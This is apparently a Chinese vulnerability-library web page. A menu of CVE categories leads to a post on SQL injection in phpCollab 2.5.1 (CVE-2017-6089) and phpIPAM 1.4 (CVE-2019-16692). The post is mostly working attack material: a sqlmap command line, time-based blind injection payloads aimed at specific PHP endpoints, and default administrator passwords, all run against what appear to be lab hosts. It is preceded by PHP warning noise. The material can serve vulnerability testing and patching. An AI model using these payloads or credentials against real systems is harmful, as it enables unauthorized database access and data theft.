Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 6 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 16 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 42 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Attempt to read property "slug" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 387

Warning: Undefined array key 58 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Attempt to read property "term_id" on null in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 388

Warning: Undefined variable $addMisc in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 336

Warning: Undefined array key 68 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

Warning: Undefined array key 95 in /www/wwwroot/101.35.165.65/wp-content/plugins/collapsing-categories/collapscatlist.php on line 222

[—]CVE漏洞库
- [—]PHP漏洞
  - 漏洞目录
  - [+]zzcms漏洞
  - [+]zabbix漏洞
  - [+]xampp漏洞
  - [+]VictorCMS漏洞
  - [+]ThinkPHP漏洞
  - [+]taocms漏洞
  - [+]SubrionCMS漏洞
  - [—]SQL注入漏洞
    
    (CVE-2017-6089)(CVE-2019-16692)
    
    (CVE-2022-32300)
    
    (CVE-2019-9762)(CVE-2022-26266)
    
    (CVE-2022-32992)(CVE-2022-26613)
    
    (MagentoSQL注入)(CVE-2022-27927)
    
    (CVE-2019-13086)(CVE-2022-24263)
    
    (CVE-2022-32991)(CVE-2022-31325)
  - [+]phpmyadmin漏洞
  - [+]php漏洞
  - [+]nagiosxi漏洞
  - [+]Metinfo漏洞
  - [+]Joomla漏洞
  - [+]Hooskcms漏洞
  - [+]finecms漏洞
  - [+]empire漏洞
  - [+]Drupal漏洞
  - [+]Discuz漏洞
  - [+]dedecms漏洞
  - [+]Made Simple漏洞
  - [+]AtomCMS漏洞
  - [+]鸳鸯漏洞
  - [+]文件上传漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [+]java漏洞
  - [+]XStream漏洞
  - [+]weblogic漏洞
  - [+]Tomcat漏洞
  - [+]struts2漏洞
  - [+]spring漏洞
  - [+]Solr漏洞
  - [+]Shiro漏洞
  - [+]OfBiz漏洞
  - [+]Nexus漏洞
  - [+]Log4j漏洞
  - [+]Kylin漏洞
  - [+]Jetty漏洞
  - [+]Jenkins漏洞
  - [+]jboss漏洞
  - [+]ElasticSearch漏洞
  - [+]druid漏洞
  - [+]ColdFusion漏洞
  - [+]ActiveMQ漏洞
  - [+]斑鸠漏洞
  - [+]反序列化漏洞
  - [+]其他漏洞
  - [+]代码命令执行漏洞
- [+]中间件漏洞
  - [+]webmin漏洞
  - [+]SaltStack漏洞
  - [+]Redis漏洞
  - [+]Rails漏洞
  - [+]python漏洞
  - [+]postgresql漏洞
  - [+]node漏洞
  - [+]nginx漏洞
  - [+]mysql漏洞
  - [+]jquery漏洞
  - [+]Imagemagick漏洞
  - [+]httpd漏洞
  - [+]GitLab漏洞
  - [+]GhostScript漏洞
  - [+]fastjson漏洞
  - [+]Django漏洞
  - [+]Couchdb漏洞
  - [+]Atlassian漏洞
  - [+]APISIX漏洞
  - [+]Airflow漏洞
  - [+]成对漏洞
  - [+]命令代码执行漏洞
  - [+]其他漏洞

8 9 月, 2024

(CVE-2017-6089)(CVE-2019-16692)

phpcollab SQL注入（CVE-2017-6089）

phpCollab是一套基于Web的项目协作管理软件。该软件具有任务分配、讨论、日志和通知等功能。 PhpCollab 2.5.1及之前的版本中存在SQL注入漏洞。远程攻击者可借助多种方法利用该漏洞执行任意的SQL命令。（多种方法包括：向topics/deletetopics.php文件发送‘project’或‘id’参数、（2）向bookmarks/deletebookmarks.php文件发送‘id’参数或（3）向calendar/deletecalendar.php文件发送‘id’参数）账户：admin，密码：123456

payload：/topics/deletetopics.php?project=1&PHPSESSID=pi6dq386vl561dra7u79ba2tp0&id=1

sqlmap -u ‘http://192.168.85.130:14615/topics/deletetopics.php?project=2&PHPSESSID=pi6dq386vl561dra7u79ba2tp0&id=1‘ –threads=1 –dbms=mysql

payload：192.168.85.130:14615/topics/deletetopics.php?project=2’+AND+(SELECT+7368+FROM+(SELECT(SLEEP(5)))Qylb)–+cIjJ&PHPSESSID=pi6dq386vl561dra7u79ba2tp0&id=1

payload：192.168.85.130:14615/calendar/deletecalendar.php?id=2+AND+(SELECT+7368+FROM+(SELECT(SLEEP(5)))Qylb)–cIjJ&PHPSESSID=pi6dq386vl561dra7u79ba2tp0

payload：192.168.85.130:14615/bookmarks/deletebookmarks.php?id=2+AND+(SELECT+7368+FROM+(SELECT(SLEEP(5)))Qylb)–cIjJ&PHPSESSID=pi6dq386vl561dra7u79ba2tp0

phpIPAM 1.4 – SQL Injection（CVE-2019-16692）

登录后台账户密码：admin/admin888

payload：http://eci-2ze38rxbp1aansfxjb6i.cloudeci1.ichunqiu.com/app/admin/routing/edit-bgp-mapping-search.php

Content-Type: application/x-www-form-urlencoded; charset=UTF-8；subnet=1″&bgp_id=1

时间注入：subnet=1″ AND (SELECT 4306 FROM (SELECT(SLEEP(5)))Diba)– crIb&bgp_id=1